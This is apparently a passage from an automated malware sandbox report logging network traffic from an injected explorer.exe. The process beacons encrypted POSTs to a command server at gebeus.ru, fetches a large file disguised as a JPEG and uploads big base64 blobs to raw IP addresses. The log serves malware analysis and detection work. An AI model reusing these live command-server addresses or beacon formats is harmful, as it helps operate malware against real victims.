                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.549759211.202.224.10801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:18:38.403007984 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ahnkvlymtyox.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 159
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:38.403043032 CEST159OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 15 fc f6
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vueSSAg[zEU`A(02SgW*s_[R
                                              Jul 23, 2024 06:18:39.869865894 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:39 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.549760211.202.224.10801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:18:44.150259972 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://scclxbagqps.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 252
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:44.150346994 CEST252OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 37 02 b1 8c
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu7Tuy[y:`"I{h.`R'_<d.\]ALpB'a0_$2G^3B)+SBs37Aj"'GLXC!
                                              Jul 23, 2024 06:18:45.619739056 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:45 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.549763211.202.224.10801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:18:49.752041101 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ftpgvbtjlgwf.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 162
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:49.752130032 CEST162OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 57 0e c1 ff
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vuWeBwa(*O6X$,RGS+xmr=tn@KYLa8f
                                              Jul 23, 2024 06:18:51.831773043 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:50 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r
                                              Jul 23, 2024 06:18:51.832367897 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:50 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r
                                              Jul 23, 2024 06:18:51.833492994 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:50 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.2.549767211.202.224.10801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:18:56.023133039 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://thvbfefxpihwuvsy.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 191
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:56.023153067 CEST191OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7e 15 d9 a8
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu~V"q\*=Z$i-;n`kz\<WAo9#n{79aQ5<Vlcxp
                                              Jul 23, 2024 06:18:57.441621065 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:57 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.549731185.149.100.2424431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:16:25 UTC179OUTGET /wp-content/images/pic1.jpg HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Host: mussangroup.com
                                              2024-07-23 04:16:26 UTC452INHTTP/1.1 200 OK
                                              Connection: close
                                              cache-control: public, max-age=604800
                                              expires: Tue, 30 Jul 2024 04:16:25 GMT
                                              content-type: image/jpeg
                                              last-modified: Sun, 21 Jul 2024 13:21:40 GMT
                                              accept-ranges: bytes
                                              content-length: 11672576
                                              date: Tue, 23 Jul 2024 04:16:25 GMT
                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.549732167.235.128.1534431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:16:27 UTC234OUTPOST / HTTP/1.1
                                              Host: 167.235.128.153
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 8931
                                              2024-07-23 04:16:27 UTC8931OUTData Raw: 4d 67 47 44 43 66 52 78 6f 32 4d 2b 4a 47 35 38 73 38 67 6b 67 38 34 43 4c 38 4e 71 72 63 4d 55 5a 69 4f 67 76 35 6b 77 36 33 44 34 30 4e 61 69 46 7a 72 6e 36 53 30 72 6f 41 49 4c 44 55 4a 74 35 49 61 68 67 47 4a 2b 4a 30 42 46 6a 4e 56 5a 63 66 35 76 39 36 65 45 4b 62 38 48 36 74 64 50 45 4d 56 71 66 54 69 6e 64 79 32 63 52 2b 62 58 32 47 77 36 37 54 73 69 6b 41 49 31 32 6b 63 68 4e 56 37 44 35 56 35 53 4d 2b 38 32 75 6e 63 63 44 30 47 63 55 46 78 7a 68 36 64 74 66 44 47 64 4c 47 74 2b 42 55 44 79 76 6a 46 32 73 75 4d 53 31 38 67 69 37 72 70 6b 4c 71 35 6c 52 38 2f 53 76 42 68 44 36 47 4c 69 63 41 46 71 32 30 2f 4f 6a 38 2b 35 57 4f 46 73 57 42 42 70 76 44 4c 47 34 4a 79 4d 58 4d 6a 52 46 4a 67 6f 44 46 53 6b 6e 68 45 51 6f 34 41 55 75 7a 52 64 4e 65 31
                                              Data Ascii: MgGDCfRxo2M+JG58s8gkg84CL8NqrcMUZiOgv5kw63D40NaiFzrn6S0roAILDUJt5IahgGJ+J0BFjNVZcf5v96eEKb8H6tdPEMVqfTindy2cR+bX2Gw67TsikAI12kchNV7D5V5SM+82unccD0GcUFxzh6dtfDGdLGt+BUDyvjF2suMS18gi7rpkLq5lR8/SvBhD6GLicAFq20/Oj8+5WOFsWBBpvDLG4JyMXMjRFJgoDFSknhEQo4AUuzRdNe1
                                              2024-07-23 04:16:28 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 733
                                              Date: Tue, 23 Jul 2024 04:16:28 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:16:28 UTC733INData Raw: 49 6d 33 4a 32 76 59 69 77 76 51 2f 75 54 38 73 64 53 69 36 4f 41 68 44 6d 64 75 75 32 49 50 6a 62 68 79 6b 46 67 4a 59 79 2b 56 6c 49 44 47 75 6f 4b 61 52 6c 75 43 65 46 67 57 59 55 32 64 70 66 31 2f 63 5a 54 42 50 45 7a 7a 45 51 71 50 64 7a 73 56 6e 42 2f 6c 61 64 51 35 34 4f 65 6c 54 5a 56 6e 78 44 65 77 65 6f 31 57 35 4d 34 66 46 46 34 78 73 2f 72 57 67 6f 4a 7a 44 52 76 46 2b 77 50 39 39 4a 67 38 6a 7a 48 51 61 4c 4a 4e 6a 65 35 43 75 35 46 69 79 52 42 33 49 52 4e 4b 37 4e 4d 6b 77 78 39 73 73 63 37 59 4f 32 31 68 6a 52 4b 68 75 6b 34 71 66 6e 45 4b 38 66 38 57 5a 31 71 32 64 58 55 45 65 47 56 4d 72 72 31 34 68 66 47 41 52 4e 69 55 69 2f 39 73 51 38 32 66 36 54 68 7a 50 66 32 6a 38 32 30 79 47 78 59 6a 46 6c 72 78 53 52 33 55 63 33 56 70 61 73 32 70
                                              Data Ascii: Im3J2vYiwvQ/uT8sdSi6OAhDmduu2IPjbhykFgJYy+VlIDGuoKaRluCeFgWYU2dpf1/cZTBPEzzEQqPdzsVnB/ladQ54OelTZVnxDeweo1W5M4fFF4xs/rWgoJzDRvF+wP99Jg8jzHQaLJNje5Cu5FiyRB3IRNK7NMkwx9ssc7YO21hjRKhuk4qfnEK8f8WZ1q2dXUEeGVMrr14hfGARNiUi/9sQ82f6ThzPf2j820yGxYjFlrxSR3Uc3Vpas2p


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.549734107.173.160.1374431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:16:29 UTC236OUTPOST / HTTP/1.1
                                              Host: 107.173.160.137
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 155043
                                              2024-07-23 04:16:29 UTC16148OUTData Raw: 64 32 6a 69 78 31 6a 59 2f 47 79 43 47 35 2f 50 54 7a 7a 74 79 4d 6a 66 79 7a 65 4a 56 58 70 5a 6c 6c 64 30 37 6c 53 42 32 69 4d 58 51 77 6d 31 49 6f 57 72 37 4a 42 6f 36 6f 72 39 50 68 77 44 6f 6c 54 69 67 55 4b 33 7a 6c 4f 51 52 5a 6d 6c 4a 79 75 70 2b 4c 47 4b 6b 52 69 50 64 78 36 4a 78 41 6e 66 62 58 6e 6c 4e 4a 4a 66 77 68 39 31 4e 65 4e 7a 79 43 73 65 53 4a 6f 45 59 74 4f 32 33 53 6a 71 56 46 79 39 63 74 45 45 39 44 6d 6c 4a 67 69 6f 2b 63 4e 50 4d 56 34 42 7a 67 70 63 36 58 2b 43 67 78 64 6c 66 4e 68 7a 4d 43 6d 6f 6d 74 67 34 57 61 44 45 66 43 4e 38 2f 41 63 73 70 75 63 66 35 38 4a 62 2b 48 6f 58 37 62 6e 6a 61 62 73 62 63 6e 6a 48 2b 62 6f 45 69 74 6f 30 2f 4f 71 4d 64 37 73 6d 54 42 52 6f 31 43 41 53 34 72 47 57 6c 4e 30 46 51 76 58 6b 69 53 34
                                              Data Ascii: d2jix1jY/GyCG5/PTzztyMjfyzeJVXpZlld07lSB2iMXQwm1IoWr7JBo6or9PhwDolTigUK3zlOQRZmlJyup+LGKkRiPdx6JxAnfbXnlNJJfwh91NeNzyCseSJoEYtO23SjqVFy9ctEE9DmlJgio+cNPMV4Bzgpc6X+CgxdlfNhzMCmomtg4WaDEfCN8/Acspucf58Jb+HoX7bnjabsbcnjH+boEito0/OqMd7smTBRo1CAS4rGWlN0FQvXkiS4
                                              2024-07-23 04:16:29 UTC16384OUTData Raw: 65 51 45 47 68 33 7a 76 74 30 65 4b 75 62 2f 4e 65 41 65 57 2f 2b 6e 64 2f 5a 36 4b 47 72 70 54 43 32 34 32 2b 49 44 4e 77 35 6f 70 39 39 30 6f 30 36 75 42 4a 37 64 61 65 44 4d 4b 56 2b 75 37 51 71 56 31 44 4a 4d 6e 74 41 31 33 43 34 6a 34 72 37 35 68 71 31 69 54 56 42 4f 31 32 54 4c 64 4d 77 38 61 37 4a 76 64 32 70 39 50 36 6e 36 5a 38 62 50 4c 35 6d 4b 39 2f 4e 34 52 53 55 30 6a 75 48 42 47 71 57 57 48 4e 72 6d 54 4a 74 4f 49 64 6a 4d 6f 43 76 78 47 67 42 6c 35 62 54 63 2b 4e 70 65 70 50 51 4f 6a 61 59 31 58 5a 43 6e 56 48 72 59 69 7a 58 53 78 4f 55 66 36 4e 52 34 37 68 63 69 75 59 30 2b 79 52 70 69 4b 58 56 4d 53 41 71 72 6c 50 61 64 62 36 2b 30 74 70 67 47 48 41 77 31 34 4e 39 37 41 55 54 78 4d 6a 4d 2b 45 39 55 39 30 70 45 69 67 49 33 6e 4e 51 70 7a
                                              Data Ascii: eQEGh3zvt0eKub/NeAeW/+nd/Z6KGrpTC242+IDNw5op990o06uBJ7daeDMKV+u7QqV1DJMntA13C4j4r75hq1iTVBO12TLdMw8a7Jvd2p9P6n6Z8bPL5mK9/N4RSU0juHBGqWWHNrmTJtOIdjMoCvxGgBl5bTc+NpepPQOjaY1XZCnVHrYizXSxOUf6NR47hciuY0+yRpiKXVMSAqrlPadb6+0tpgGHAw14N97AUTxMjM+E9U90pEigI3nNQpz
                                              2024-07-23 04:16:29 UTC16384OUTData Raw: 65 79 4a 6d 50 37 35 69 71 53 72 79 54 59 6f 72 6f 6f 43 37 66 65 62 67 64 76 51 66 38 67 77 7a 33 69 64 5a 4c 2f 47 52 54 6d 44 73 6f 74 73 4d 30 71 6b 2b 39 41 35 57 44 36 2b 2f 44 42 41 30 65 59 33 51 66 36 78 69 4c 75 35 4f 78 4a 2f 62 4b 7a 50 72 44 54 42 77 71 52 79 2b 69 44 43 49 70 2b 2b 45 6a 6f 4f 7a 42 2f 71 56 45 63 47 35 43 79 4c 50 32 53 55 58 4b 54 64 4a 37 78 34 53 74 69 56 37 33 5a 6b 38 51 65 51 37 72 4e 6d 61 66 70 73 51 42 32 41 72 36 72 73 31 2b 67 5a 59 77 63 63 4d 54 79 2b 47 67 44 64 2f 61 67 78 52 69 56 52 35 52 69 70 6b 59 44 36 49 32 57 30 51 4f 4f 6e 47 51 33 53 6a 45 63 57 63 2f 49 38 6a 64 37 6e 31 47 77 5a 44 4a 4a 4e 67 70 69 31 49 55 69 47 53 44 2f 36 6b 34 34 32 62 47 4e 62 46 31 77 39 38 63 44 6d 4d 63 70 54 6c 4d 53 34
                                              Data Ascii: eyJmP75iqSryTYorooC7febgdvQf8gwz3idZL/GRTmDsotsM0qk+9A5WD6+/DBA0eY3Qf6xiLu5OxJ/bKzPrDTBwqRy+iDCIp++EjoOzB/qVEcG5CyLP2SUXKTdJ7x4StiV73Zk8QeQ7rNmafpsQB2Ar6rs1+gZYwccMTy+GgDd/agxRiVR5RipkYD6I2W0QOOnGQ3SjEcWc/I8jd7n1GwZDJJNgpi1IUiGSD/6k442bGNbF1w98cDmMcpTlMS4
                                              2024-07-23 04:16:29 UTC16384OUTData Raw: 7a 47 35 72 57 2f 39 59 31 35 70 4a 32 65 2f 4a 6e 63 41 61 56 64 61 36 7a 68 73 63 70 6c 4c 61 6d 78 6b 56 69 6b 4a 4e 62 74 58 38 47 69 2b 79 37 37 33 7a 33 78 39 4c 53 4d 31 43 41 46 30 54 44 6c 6e 34 65 66 59 77 6b 63 45 79 69 31 51 4e 70 6a 64 7a 4b 6f 64 48 70 78 61 70 30 35 57 69 4e 75 64 6f 4a 56 4b 72 65 37 56 4b 6e 6b 6c 35 54 77 46 34 76 6d 70 33 44 39 5a 4f 37 63 74 74 53 56 62 30 4a 4e 64 38 33 6a 57 38 2b 49 54 78 31 76 79 78 69 7a 65 35 30 62 4e 2f 35 49 76 56 37 34 35 55 79 77 49 74 43 42 6a 44 38 75 66 62 51 55 51 79 6d 78 6e 6e 61 6f 2f 30 75 36 43 42 2f 41 61 41 33 63 79 4a 78 78 45 52 55 34 6c 75 4e 6f 6b 4d 79 50 49 32 31 35 4c 45 4b 44 6b 76 53 73 62 34 4d 72 38 78 66 70 73 62 6e 67 4e 69 49 58 33 6a 2f 77 6d 76 47 59 69 6a 42 48 43
                                              Data Ascii: zG5rW/9Y15pJ2e/JncAaVda6zhscplLamxkVikJNbtX8Gi+y773z3x9LSM1CAF0TDln4efYwkcEyi1QNpjdzKodHpxap05WiNudoJVKre7VKnkl5TwF4vmp3D9ZO7cttSVb0JNd83jW8+ITx1vyxize50bN/5IvV745UywItCBjD8ufbQUQymxnnao/0u6CB/AaA3cyJxxERU4luNokMyPI215LEKDkvSsb4Mr8xfpsbngNiIX3j/wmvGYijBHC
                                              2024-07-23 04:16:29 UTC16384OUTData Raw: 52 6f 4b 69 7a 61 52 38 42 47 2f 72 2b 43 49 6f 42 51 73 74 38 4b 52 57 31 48 64 70 43 71 71 4d 62 66 6c 78 62 76 55 2b 35 31 43 75 71 55 73 52 6c 38 50 69 6c 2f 77 73 74 6e 6d 74 46 36 30 36 63 78 55 57 32 55 78 2b 4a 55 72 41 71 47 4d 32 78 2f 38 44 44 42 69 56 71 38 79 68 55 53 62 59 77 38 45 32 4f 4d 4a 56 45 49 6a 7a 64 61 51 48 33 4d 6a 66 33 64 42 5a 54 4b 32 4a 69 59 48 39 34 4d 73 79 6f 59 61 49 56 52 77 69 54 72 54 47 75 64 59 62 7a 66 31 56 36 2f 68 72 36 53 4d 4e 48 69 35 6d 65 57 64 4e 71 69 68 72 37 34 39 4e 33 64 30 6b 53 4d 52 50 59 71 76 65 30 43 6b 7a 6b 30 42 39 4a 6e 56 32 4d 62 36 2f 54 39 52 66 76 75 33 75 67 6b 52 4e 69 74 67 6c 43 72 47 45 6f 43 6f 62 77 4b 6f 46 68 6b 2f 2f 32 65 44 50 53 71 65 42 48 76 31 72 59 66 44 59 4d 66 6d
                                              Data Ascii: RoKizaR8BG/r+CIoBQst8KRW1HdpCqqMbflxbvU+51CuqUsRl8Pil/wstnmtF606cxUW2Ux+JUrAqGM2x/8DDBiVq8yhUSbYw8E2OMJVEIjzdaQH3Mjf3dBZTK2JiYH94MsyoYaIVRwiTrTGudYbzf1V6/hr6SMNHi5meWdNqihr749N3d0kSMRPYqve0Ckzk0B9JnV2Mb6/T9Rfvu3ugkRNitglCrGEoCobwKoFhk//2eDPSqeBHv1rYfDYMfm
                                              2024-07-23 04:16:29 UTC16384OUTData Raw: 57 7a 34 44 6c 39 63 48 65 4c 6f 79 68 2f 6f 78 31 6a 4c 38 6f 45 55 51 36 35 4a 62 38 35 6e 4c 35 58 6f 32 51 72 63 57 43 39 32 35 4b 74 78 72 41 70 6c 53 6e 74 71 6c 38 69 48 34 35 79 57 58 59 76 59 5a 71 46 6a 58 74 38 54 5a 6b 6c 78 4a 62 4d 48 74 6a 30 79 65 41 2f 35 4a 67 79 37 33 69 32 41 63 66 39 66 59 77 37 6b 79 72 37 76 2f 44 54 4e 4e 52 4d 37 43 4b 59 4e 74 77 31 71 6b 55 45 62 55 30 77 6b 53 5a 45 70 59 54 65 7a 79 6b 71 75 78 4a 69 59 35 62 67 71 32 62 71 67 66 57 70 47 69 37 55 56 64 6e 4e 31 67 50 77 65 6f 33 75 44 4a 41 4e 48 42 6e 53 6e 2f 2b 55 70 41 4f 59 64 71 46 42 7a 35 66 53 62 50 30 6a 56 39 6e 59 4e 45 32 55 6e 41 31 37 6b 53 54 5a 30 4e 75 38 57 76 6c 77 75 55 4c 72 4f 4e 73 4b 4a 79 63 77 55 42 56 49 4b 4b 4c 7a 6b 4a 6e 35 78
                                              Data Ascii: Wz4Dl9cHeLoyh/ox1jL8oEUQ65Jb85nL5Xo2QrcWC925KtxrAplSntql8iH45yWXYvYZqFjXt8TZklxJbMHtj0yeA/5Jgy73i2Acf9fYw7kyr7v/DTNNRM7CKYNtw1qkUEbU0wkSZEpYTezykquxJiY5bgq2bqgfWpGi7UVdnN1gPweo3uDJANHBnSn/+UpAOYdqFBz5fSbP0jV9nYNE2UnA17kSTZ0Nu8WvlwuULrONsKJycwUBVIKKLzkJn5x
                                              2024-07-23 04:16:29 UTC16384OUTData Raw: 50 36 34 2b 2b 59 4b 50 6c 6a 64 6e 49 50 67 46 42 66 34 51 58 43 69 36 6e 6f 32 35 54 33 4e 75 59 36 53 37 54 39 78 79 4a 43 75 57 49 73 5a 58 79 6a 79 37 42 53 64 6f 31 58 48 42 50 37 31 30 43 48 70 46 43 31 65 55 4f 74 36 36 51 59 31 62 79 4b 36 74 61 50 38 54 2f 33 56 6e 4c 5a 33 68 76 6c 78 74 7a 74 56 4f 4b 34 68 54 37 73 66 46 41 4f 52 44 6f 42 6d 6b 6d 53 4e 35 59 6a 41 70 6a 72 5a 62 59 78 6d 49 32 2b 35 72 56 59 6c 62 4a 67 48 64 43 6d 6c 4d 6a 54 65 37 41 47 32 54 57 45 38 48 34 57 75 65 6a 71 71 51 53 49 6b 2f 4f 55 30 36 67 71 76 79 47 6a 31 33 72 59 31 59 4c 78 61 4f 6b 5a 5a 4e 4d 52 53 36 67 67 58 2f 4e 63 6b 74 34 36 37 6c 6a 33 50 70 64 68 41 50 47 51 49 36 2b 51 70 73 41 52 66 35 51 6e 47 75 56 55 77 74 34 59 76 6d 43 65 61 74 50 47 77
                                              Data Ascii: P64++YKPljdnIPgFBf4QXCi6no25T3NuY6S7T9xyJCuWIsZXyjy7BSdo1XHBP710CHpFC1eUOt66QY1byK6taP8T/3VnLZ3hvlxtztVOK4hT7sfFAORDoBmkmSN5YjApjrZbYxmI2+5rVYlbJgHdCmlMjTe7AG2TWE8H4WuejqqQSIk/OU06gqvyGj13rY1YLxaOkZZNMRS6ggX/Nckt467lj3PpdhAPGQI6+QpsARf5QnGuVUwt4YvmCeatPGw
                                              2024-07-23 04:16:29 UTC16384OUTData Raw: 6d 45 78 58 32 45 74 55 76 39 55 71 43 64 39 71 37 33 74 39 67 56 66 6d 74 44 31 50 68 66 67 31 4f 7a 74 57 35 6a 65 6a 30 6a 61 4b 42 36 6c 53 44 4d 75 67 54 49 53 69 32 6e 65 59 41 69 46 75 53 4c 48 41 74 6f 43 30 54 71 6a 4b 55 70 55 55 4d 4d 70 34 48 69 36 43 30 37 62 53 58 39 78 52 30 43 6f 63 6d 57 57 71 67 6e 49 4f 56 45 53 58 4a 4d 67 75 36 78 70 53 46 35 79 30 56 54 5a 79 65 58 46 57 33 6d 67 35 70 57 39 72 30 75 54 53 48 43 32 73 70 50 38 68 72 6c 4b 74 65 4d 5a 53 4b 6a 75 6f 58 75 59 72 73 44 6d 48 54 6c 65 31 58 71 56 65 34 57 4d 75 36 76 32 69 65 77 6f 52 4e 67 65 4b 57 62 62 41 43 58 42 54 41 32 50 4a 31 47 2f 73 4a 37 68 4b 73 31 67 64 47 30 2b 6b 68 30 73 6a 56 6f 76 57 4d 6d 2b 51 79 6c 77 79 52 58 46 48 66 31 2b 66 35 5a 51 35 44 49 30
                                              Data Ascii: mExX2EtUv9UqCd9q73t9gVfmtD1Phfg1OztW5jej0jaKB6lSDMugTISi2neYAiFuSLHAtoC0TqjKUpUUMMp4Hi6C07bSX9xR0CocmWWqgnIOVESXJMgu6xpSF5y0VTZyeXFW3mg5pW9r0uTSHC2spP8hrlKteMZSKjuoXuYrsDmHTle1XqVe4WMu6v2iewoRNgeKWbbACXBTA2PJ1G/sJ7hKs1gdG0+kh0sjVovWMm+QylwyRXFHf1+f5ZQ5DI0
                                              2024-07-23 04:16:29 UTC16384OUTData Raw: 70 7a 74 46 48 2f 65 77 33 4d 58 35 46 34 72 2f 48 5a 57 33 33 63 64 4a 69 4c 54 73 55 78 4b 64 43 4f 39 57 5a 6e 2f 73 6f 71 57 67 79 67 4e 74 30 57 30 69 7a 69 5a 37 77 76 36 41 33 32 2b 2b 63 72 6c 49 4d 55 75 63 38 63 38 68 71 32 38 33 59 73 34 66 74 79 6a 68 59 4f 54 4f 78 47 48 44 76 48 53 67 6f 56 76 6d 74 65 69 53 32 77 68 38 47 55 56 5a 37 45 4d 48 32 70 66 32 4b 4f 4b 6f 54 45 35 45 34 33 48 72 4b 72 75 57 35 4a 58 48 77 42 58 39 30 4e 51 2f 70 34 41 45 43 6d 63 32 39 64 6b 76 6d 57 59 71 43 6e 79 4b 74 55 72 53 51 67 53 54 73 51 48 31 49 53 65 39 46 4e 43 79 2b 4a 69 55 51 70 69 54 74 2b 68 42 68 67 53 31 59 6a 6b 45 6c 48 68 69 2f 42 4f 75 2f 56 34 56 44 35 47 69 32 4c 33 64 77 32 62 48 50 61 6d 66 5a 43 78 4c 6c 53 35 4e 46 54 66 4f 55 33 5a
                                              Data Ascii: pztFH/ew3MX5F4r/HZW33cdJiLTsUxKdCO9WZn/soqWgygNt0W0iziZ7wv6A32++crlIMUuc8c8hq283Ys4ftyjhYOTOxGHDvHSgoVvmteiS2wh8GUVZ7EMH2pf2KOKoTE5E43HrKruW5JXHwBX90NQ/p4AECmc29dkvmWYqCnyKtUrSQgSTsQH1ISe9FNCy+JiUQpiTt+hBhgS1YjkElHhi/BOu/V4VD5Gi2L3dw2bHPamfZCxLlS5NFTfOU3Z
                                              2024-07-23 04:16:29 UTC7823OUTData Raw: 78 7a 64 39 44 72 65 47 50 52 61 71 50 38 76 35 69 52 58 77 35 36 34 59 6d 41 6b 73 78 66 6b 33 4f 32 41 6c 57 74 35 71 45 41 39 46 30 65 4a 71 39 72 66 4e 79 4a 74 68 75 54 48 70 42 42 63 4a 66 6f 54 36 74 5a 38 46 73 79 62 51 45 6c 47 4a 38 6a 6e 42 4b 46 52 64 54 4f 73 73 38 47 34 78 6d 35 63 50 56 64 59 42 63 44 56 6d 73 72 71 6d 4f 42 4e 78 73 45 64 41 4e 59 46 34 69 61 53 55 4e 39 79 66 58 4f 6a 43 70 46 65 4e 77 67 65 63 36 46 62 79 34 69 58 41 6d 53 42 45 39 47 50 62 41 49 78 45 46 4f 52 47 6e 68 2b 62 37 32 68 79 37 67 2f 2f 66 67 75 6f 37 58 37 6e 70 37 39 6e 79 67 2b 42 47 76 6a 6b 6b 7a 38 38 30 6a 53 52 6a 37 45 44 6a 53 50 38 69 66 57 62 79 73 39 4a 36 45 4e 7a 2f 77 63 58 49 57 4a 66 43 65 4c 73 61 78 76 42 42 35 76 59 52 69 70 6c 51 58 6e
                                              Data Ascii: xzd9DreGPRaqP8v5iRXw564YmAksxfk3O2AlWt5qEA9F0eJq9rfNyJthuTHpBBcJfoT6tZ8FsybQElGJ8jnBKFRdTOss8G4xm5cPVdYBcDVmsrqmOBNxsEdANYF4iaSUN9yfXOjCpFeNwgec6Fby4iXAmSBE9GPbAIxEFORGnh+b72hy7g//fguo7X7np79nyg+BGvjkkz880jSRj7EDjSP8ifWbys9J6ENz/wcXIWJfCeLsaxvBB5vYRiplQXn
                                              2024-07-23 04:16:31 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:16:31 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.549735107.173.160.1394431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
